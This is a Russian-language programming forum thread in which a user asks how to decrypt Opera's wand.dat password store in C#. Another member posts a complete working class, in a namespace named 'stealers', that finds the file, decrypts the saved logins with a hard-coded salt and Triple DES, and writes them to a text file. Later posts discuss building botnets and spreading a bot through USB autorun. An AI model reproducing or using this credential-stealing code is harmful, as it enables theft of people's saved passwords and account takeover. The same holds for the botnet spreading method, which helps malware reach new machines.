|
Расшифровка wand.dat (пароли Opera) - Вопросы и ответы, обсуждения - Ваши вопросы по C# только в данном разделе |
30.08.2012, 18:41
|
#1
|
|
|
|
Разведчик
|
Регистрация: 26.08.2012
Сообщений: 7
Популярность: 387
Сказал(а) спасибо: 6
Поблагодарили 14 раз(а) в 9 сообщениях
|
Расшифровка wand.dat (пароли Opera)
Привет Всем
Я бы хотел узнать возможно ли расшифровать файл wand.dat на шарпе?
Если да, то как?)
|
|
|
30.08.2012, 19:32
|
#2
|
|
|
|
Рыцарь-капитан
|
Регистрация: 29.01.2010
Сообщений: 547
Популярность: 41279
Сказал(а) спасибо: 692
Поблагодарили 2,270 раз(а) в 1,035 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
а тебе зачем? не деструктивная ли деятельность часом?
|
|
|
30.08.2012, 19:47
|
#3
|
|
|
|
Разведчик
|
Регистрация: 26.08.2012
Сообщений: 7
Популярность: 387
Сказал(а) спасибо: 6
Поблагодарили 14 раз(а) в 9 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
|
|
|
30.08.2012, 19:55
|
#4
|
|
|
|
Рыцарь-капитан
|
Регистрация: 29.01.2010
Сообщений: 547
Популярность: 41279
Сказал(а) спасибо: 692
Поблагодарили 2,270 раз(а) в 1,035 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
|
Цитата: |
|
|
|
|
Сообщение от BassBoy[Aмнис] |
|
|
|
|
Код:
using System;
using System.Collections.Generic;
using System.Text;
using System.Security.Cryptography;
using System.IO;
namespace stealers
{
class OperaDecrypt
{
public static byte[] OperaSalt = { 0x83, 0x7D, 0xFC, 0x0F, 0x8E, 0xB3, 0xE8, 0x69, 0x73, 0xAF, 0xFF };
public static string Path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
public static string Lognameopera = @"Opera.txt";
public static void Getpass()
{
if (File.Exists(Lognameopera))
{
File.Delete(Lognameopera);
}
if(File.Exists(Path + @"\Opera\Opera\wand.dat"))
{
Path += @"\Opera\Opera\wand.dat";
FindBlocks();
}
else if (File.Exists(Path + @"\Opera\Opera\profile\wand.dat"))
{
Path += @"\Opera\Opera\profile\wand.dat";
FindBlocks();
}
}
public static void FindBlocks()
{
var writer = File.CreateText(Lognameopera);
try
{
var tmpData = new List<string>();
var wandFile = File.ReadAllBytes(Path);
for (var i = 0; i < wandFile.Length - 4; i++)
{
if (wandFile[i] != 0x00 || wandFile[i + 1] != 0x00 || wandFile[i + 2] != 0x00 || wandFile[i + 3] != 0x08)
continue;
var blockSize = (int)wandFile[i + 15];
var key = new byte[8];
var encryptData = new byte[blockSize];
Array.Copy(wandFile, i + 4, key, 0, key.Length);
Array.Copy(wandFile, i + 16, encryptData, 0, encryptData.Length);
tmpData.Add(Decrypt2Method(key, encryptData));
i += 11 + blockSize;
}
foreach (var line in tmpData)
{
writer.WriteLine(line);
writer.Flush();
}
}
catch
{
}
writer.Close();
}
public static string Decrypt2Method(byte[] key, byte[] encryptData)
{
try
{
var md5Crypt = new MD5CryptoServiceProvider();
md5Crypt.Initialize();
var tmpBuffer = new byte[OperaSalt.Length + key.Length];
Array.Copy(OperaSalt, tmpBuffer, OperaSalt.Length);
Array.Copy(key, 0, tmpBuffer, OperaSalt.Length, key.Length);
var hash1 = md5Crypt.ComputeHash(tmpBuffer);
tmpBuffer = new byte[hash1.Length + OperaSalt.Length + key.Length];
Array.Copy(hash1, tmpBuffer, hash1.Length);
Array.Copy(OperaSalt, 0, tmpBuffer, hash1.Length, OperaSalt.Length);
Array.Copy(key, 0, tmpBuffer, hash1.Length + OperaSalt.Length, key.Length);
var hash2 = md5Crypt.ComputeHash(tmpBuffer);
var tripleDes = new TripleDESCryptoServiceProvider {Mode = CipherMode.CBC, Padding = PaddingMode.None};
var tripleKey = new byte[24];
var IV = new byte[8];
Array.Copy(hash1, tripleKey, hash1.Length);
Array.Copy(hash2, 0, tripleKey, hash1.Length, 8);
Array.Copy(hash2, 8, IV, 0, 8);
tripleDes.Key = tripleKey;
tripleDes.IV = IV;
var decryter = tripleDes.CreateDecryptor();
var output = decryter.TransformFinalBlock(encryptData, 0, encryptData.Length);
var enc = Encoding.Unicode.GetString(output);
return enc;
}
catch
{
return "";
}
}
}
}
Последний раз редактировалось warl0ck; 30.08.2012 в 21:18.
|
|
|
30.08.2012, 20:16
|
#5
|
|
|
|
Разведчик
|
Регистрация: 26.08.2012
Сообщений: 7
Популярность: 387
Сказал(а) спасибо: 6
Поблагодарили 14 раз(а) в 9 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
warl0ck, а можешь пример использования класса рассписать?
|
|
|
30.08.2012, 20:23
|
#6
|
|
|
|
Рыцарь-капитан
|
Регистрация: 29.01.2010
Сообщений: 547
Популярность: 41279
Сказал(а) спасибо: 692
Поблагодарили 2,270 раз(а) в 1,035 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
Getpass() вызывай, что сложного то >.>
|
|
|
30.08.2012, 20:29
|
#7
|
|
|
|
Разведчик
|
Регистрация: 26.08.2012
Сообщений: 7
Популярность: 387
Сказал(а) спасибо: 6
Поблагодарили 14 раз(а) в 9 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
Последний раз редактировалось BassBoy[Aмнис]; 30.08.2012 в 20:36.
|
|
|
30.08.2012, 20:36
|
#8
|
|
|
|
Сержант
|
Регистрация: 01.10.2011
Сообщений: 128
Популярность: 5723
Сказал(а) спасибо: 25
Поблагодарили 174 раз(а) в 105 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
warl0ck, если нужно вызывать только GetPass, почему у тебя все методы отмечены как паблик?
________________
Talk is cheap. Show me the code
— Linus Torvalds
|
|
|
30.08.2012, 20:37
|
#9
|
|
|
|
Рыцарь-капитан
|
Регистрация: 29.01.2010
Сообщений: 547
Популярность: 41279
Сказал(а) спасибо: 692
Поблагодарили 2,270 раз(а) в 1,035 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
|
|
|
30.08.2012, 20:59
|
#10
|
|
|
|
Разведчик
|
Регистрация: 26.08.2012
Сообщений: 7
Популярность: 387
Сказал(а) спасибо: 6
Поблагодарили 14 раз(а) в 9 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
|
|
|
30.08.2012, 21:01
|
#11
|
|
|
|
Сержант
|
Регистрация: 01.10.2011
Сообщений: 128
Популярность: 5723
Сказал(а) спасибо: 25
Поблагодарили 174 раз(а) в 105 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
а еще мне кажется, что писать ботнет на шарпе это маленько глупо, хоть и положительный опыт.
шарп хорошо бы выступил в качестве сервиса для управления этим делом
ЗЫ Сам писал, профита - 0, полезного опыта - over900
________________
Talk is cheap. Show me the code
— Linus Torvalds
|
|
|
30.08.2012, 21:07
|
#12
|
|
|
|
Старший сержант
|
Регистрация: 29.07.2011
Сообщений: 197
Популярность: 8989
Сказал(а) спасибо: 45
Поблагодарили 175 раз(а) в 139 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
|
|
|
30.08.2012, 21:14
|
#13
|
|
|
|
Рыцарь-капитан
|
Регистрация: 29.01.2010
Сообщений: 547
Популярность: 41279
Сказал(а) спасибо: 692
Поблагодарили 2,270 раз(а) в 1,035 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
|
Цитата: |
|
|
|
|
|
|
|
|
|
Распространял ручками?
|
|
|
|
|
|
да зачем распространять, ради опыта же пишем
|
Цитата: |
|
|
|
|
|
|
|
|
|
а еще мне кажется, что писать ботнет на шарпе это маленько глупо, хоть и положительный опыт.
шарп хорошо бы выступил в качестве сервиса для управления этим делом
ЗЫ Сам писал, профита - 0, полезного опыта - over900
|
|
|
|
|
|
да, но есть и плюсы.
писал чтоб подучить сокеты и как это всё работает. тк не знал что написать(ну клиент-сервер "привет пока" это как-то по детски) гуглил и нашел описание некого п2п ботнета, по началу вовсе не понял как это всё работает. вообщем опыта получил действительно много, хоть ничего толкового так и не написал
|
Цитата: |
|
|
|
|
Сообщение от BassBoy[Aмнис] |
|
|
|
|
|
|
|
warl0ck, так можешь сказать как исправить это:
|
|
|
|
|
|
да всё нормально, ты же не для заказчика пишешь?
Последний раз редактировалось warl0ck; 30.08.2012 в 21:17.
|
|
|
30.08.2012, 22:39
|
#14
|
|
|
|
Разведчик
|
Регистрация: 26.08.2012
Сообщений: 7
Популярность: 387
Сказал(а) спасибо: 6
Поблагодарили 14 раз(а) в 9 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
|
|
|
30.08.2012, 23:13
|
#15
|
|
|
|
Сержант
|
Регистрация: 01.10.2011
Сообщений: 128
Популярность: 5723
Сказал(а) спасибо: 25
Поблагодарили 174 раз(а) в 105 сообщениях
|
Re: Расшифровка wand.dat (пароли Opera)
Sinyss, для распространения следил за подключенными девайсами, если это была флешка то копировался на нее и создавался авторан, но дальше друзей я его не пытался запустить.
warl0ck, а я что-бы закрепить сокеты писал войс чат, по которому уже грозился написать здесь статью, но руки никак не доходят.
ЗЫ Ботнет через сокеты это сурово, т.к. нужно где-то хоститься, а вот WCF служба в самый раз
Добавлено через 16 минут
BassBoy[Aмнис], залей файлик, я ковырну
________________
Talk is cheap. Show me the code
— Linus Torvalds
Последний раз редактировалось Yukikaze; 30.08.2012 в 23:30.
Причина: Добавлено сообщение
|
|
|
Ваши права в разделе
|
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
HTML код Выкл.
|
|
|
Похожие темы
|
Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
Opera - 11.61
|
IvanK0 |
Интернет и браузеры |
2 |
12.07.2012 22:58 |
Opera
|
subbiwOw~ |
Общение и обсуждение Counter-Strike |
6 |
18.03.2011 16:35 |
Заявление об ответственности / Список мошенников
Часовой пояс GMT +4, время: 13:23.
|
|